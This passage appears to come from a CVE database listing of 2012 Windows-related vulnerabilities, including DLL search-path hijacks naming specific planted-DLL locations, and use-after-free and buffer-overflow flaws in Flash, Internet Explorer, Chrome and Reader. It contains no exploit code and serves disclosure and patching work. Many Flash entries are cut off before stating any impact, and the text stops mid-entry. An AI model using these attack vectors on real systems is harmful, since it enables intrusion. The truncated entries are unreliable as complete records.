Cisco VPN Client on Windows does not properly interact with the kernel, which allows local users to cause a denial of service (kernel fault and system crash) via a crafted application, aka Bug ID CSCuc81669. [CVE-2012-5383] DISPUTED Untrusted search path vulnerability in the installation functionality in Oracle MySQL 5.5.28, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the "C:\MySQL\MySQL Server 5.5\bin" directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the MySQL installation. [CVE-2012-5382] DISPUTED Untrusted search path vulnerability in the installation functionality in Zend Server 5.6.0 SP4, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the C:\Zend\ZendServer\share\ZendFramework\bin directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the choice of C:\ (and the resulting unsafe PATH) is established by an administrative action that is not a default part of the Zend Server installation. [CVE-2012-5381] DISPUTED Untrusted search path vulnerability in the installation functionality in PHP 5.3.17, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the C:\PHP directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the PHP installation. [CVE-2012-5380] DISPUTED Untrusted search path vulnerability in the installation functionality in Ruby 1.9.3-p194, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the C:\Ruby193\bin directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the Ruby installation. [CVE-2012-5379] DISPUTED Untrusted search path vulnerability in the installation functionality in ActivePython 3.2.2.3, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the C:\Python27 or C:\Python27\Scripts directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the ActivePython installation. [CVE-2012-5378] Untrusted search path vulnerability in the installation functionality in ActiveTcl 8.5.12, when installed in the top-level C:\ directory, allows local users to gain privileges via a Trojan horse DLL in the C:\TD\bin directory, which is added to the PATH system environment variable, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. [CVE-2012-5377] Untrusted search path vulnerability in the installation functionality in ActivePerl 5.16.1.1601, when installed in the top-level C:\ directory, allows local users to gain privileges via a Trojan horse DLL in the C:\Perl\Site\bin directory, which is added to the PATH system environment variable, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. [CVE-2012-5287] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5286] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5285] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5280] Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5279] Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5278] Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5277] Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5276] Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5275] Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5274] Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x [CVE-2012-5272] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5271] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5270] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5269] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5268] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5267] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5266] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5265] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5264] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5263] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5262] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5261] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5260] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5259] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5258] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5257] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5256] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5255] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5254] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5253] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5252] Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5251] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5250] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5249] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5248] Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x [CVE-2012-5154] Integer overflow in Google Chrome before 24.0.1312.52 on Windows allows attackers to cause a denial of service or possibly have unspecified other impact via vectors related to allocation of shared memory. [CVE-2012-4969] Use-after-free vulnerability in the CMshtmlEd::Exec function in mshtml.dll in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site, as exploited in the wild in September 2012. [CVE-2012-4792] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object, and exploited in the wild in December 2012. [CVE-2012-4791] Microsoft Exchange Server 2007 SP3 and 2010 SP1 and SP2 allows remote authenticated users to cause a denial of service (Information Store service hang) by subscribing to a crafted RSS feed, aka "RSS Feed May Cause Exchange DoS Vulnerability." [CVE-2012-4787] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly initialized or (2) is deleted, aka "Improper Ref Counting Use After Free Vulnerability." [CVE-2012-4782] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "CMarkup Use After Free Vulnerability." [CVE-2012-4781] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "InjectHTMLStream Use After Free Vulnerability." [CVE-2012-4777] The code-optimization feature in the reflection implementation in Microsoft .NET Framework 4 and 4.5 does not properly enforce object permissions, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka "WPF Reflection Optimization Vulnerability." [CVE-2012-4776] The Web Proxy Auto-Discovery (WPAD) functionality in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not validate configuration data that is returned during acquisition of proxy settings, which allows remote attackers to execute arbitrary JavaScript code by providing crafted data during execution of (1) an XAML browser application (aka XBAP) or (2) a .NET Framework application, aka "Web Proxy Auto-Discovery Vulnerability." [CVE-2012-4775] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site, aka "CTreeNode Use After Free Vulnerability." [CVE-2012-4363] Multiple unspecified vulnerabilities in Adobe Reader through 10.1.4 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PDF document, related to "sixteen more crashes affecting Windows, OS X, or both systems." [CVE-2012-4350] Multiple unquoted Windows search path vulnerabilities in the (1) Manager and (2) Agent components in Symantec Enterprise Security Manager (ESM) before 11.0 allow local users to gain privileges via unspecified vectors. [CVE-2012-4349] Unquoted Windows search path vulnerability in Symantec Network Access Control (SNAC) 12.1 before RU2 allows local users to gain privileges via unspecified vectors. [CVE-2012-4337] Foxit Reader before 5.3 on Windows XP and Windows 7 allows remote attackers to execute arbitrary code via a PDF document with a crafted attachment that triggers calculation of a negative number during processing of cross references. [CVE-2012-4206] Untrusted search path vulnerability in the installer in Mozilla Firefox before 17.0 and Firefox ESR 10.x before 10.0.11 on Windows allows local users to gain privileges via a Trojan horse DLL in the default downloads directory. [CVE-2012-4171] Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4168] Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4167] Integer overflow in Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4165] Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4164] Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4163] Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x [CVE-2012-4160] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, and CVE-2012-4159. [CVE-2012-4159] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, and CVE-2012-4160. [CVE-2012-4158] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4157] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4156] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4155] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4154] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4153] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4152] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4151] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4150] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4149] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4148, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4148] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4147, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4147] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2051, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-4145] Unspecified vulnerability in Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x before 12.01 on Mac OS X, has unknown impact and attack vectors, related to a "low severity issue." [CVE-2012-4144] Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x before 12.01 on Mac OS X, does not properly escape characters in DOM elements, which makes it easier for remote attackers to bypass cross-site scripting (XSS) protection mechanisms via a crafted HTML document. [CVE-2012-4143] Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x before 12.01 on Mac OS X, allows user-assisted remote attackers to trick users into downloading and executing arbitrary files via a small window for the download dialog, a different vulnerability than CVE-2012-1924. [CVE-2012-4142] Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x before 12.01 on Mac OS X, ignores some characters in HTML documents in unspecified circumstances, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via a crafted document. [CVE-2012-3974] Untrusted search path vulnerability in the installer in Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, Thunderbird before 15.0, and Thunderbird ESR 10.x before 10.0.7 on Windows allows local users to gain privileges via a Trojan horse executable file in a root directory. [CVE-2012-3569] Format string vulnerability in VMware OVF Tool 2.1 on Windows, as used in VMware Workstation 8.x before 8.0.5, VMware Player 4.x before 4.0.5, and other products, allows user-assisted remote attackers to execute arbitrary code via a crafted OVF file. [CVE-2012-3456] Heap-based buffer overflow in the read function in filters/words/msword-odf/wv2/src/styles.cpp in the Microsoft import filter in Calligra 2.4.3 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted ODF style in an ODF document. NOTE: this is the same vulnerability as CVE-2012-3455, but it was SPLIT by the CNA even though Calligra and KOffice share the same codebase. [CVE-2012-3455] Heap-based buffer overflow in the read function in filters/words/msword-odf/wv2/src/styles.cpp in the Microsoft import filter in KOffice 2.3.3 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted ODF style in an ODF document. NOTE: this is the same vulnerability as CVE-2012-3456, but it was SPLIT by the CNA even though Calligra and KOffice share the same codebase. [CVE-2012-3324] Directory traversal vulnerability in the UTL_FILE module in IBM DB2 and DB2 Connect 10.1 before FP1 on Windows allows remote authenticated users to modify, delete, or read arbitrary files via a pathname in the file field. [CVE-2012-2972] The (1) server and (2) agent components in CA ARCserve Backup r12.5, r15, and r16 on Windows do not properly validate RPC requests, which allows remote attackers to cause a denial of service (service crash) via a crafted request. [CVE-2012-2971] The server in CA ARCserve Backup r12.5, r15, and r16 on Windows does not properly process RPC requests, which allows remote attackers to execute arbitrary code or cause a denial of service via a crafted request. [CVE-2012-2860] The date-picker implementation in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows user-assisted remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted web site. [CVE-2012-2858] Buffer overflow in the WebP decoder in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted WebP image. [CVE-2012-2857] Use-after-free vulnerability in the Cascading Style Sheets (CSS) DOM implementation in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document. [CVE-2012-2856] The PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger out-of-bounds write operations. [CVE-2012-2855] Use-after-free vulnerability in the PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document. [CVE-2012-2854] Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to obtain potentially sensitive information about pointer values by leveraging access to a WebUI renderer process. [CVE-2012-2853] The webRequest API in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, does not properly interact with the Chrome Web Store, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted web site. [CVE-2012-2852] The PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, does not properly handle object linkage, which allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via a crafted document. [CVE-2012-2851] Multiple integer overflows in the PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allow remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document. [CVE-2012-2850] Multiple unspecified vulnerabilities in the PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allow remote attackers to have an unknown impact via a crafted document. [CVE-2012-2849] Off-by-one error in the GIF decoder in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted image. [CVE-2012-2848] The 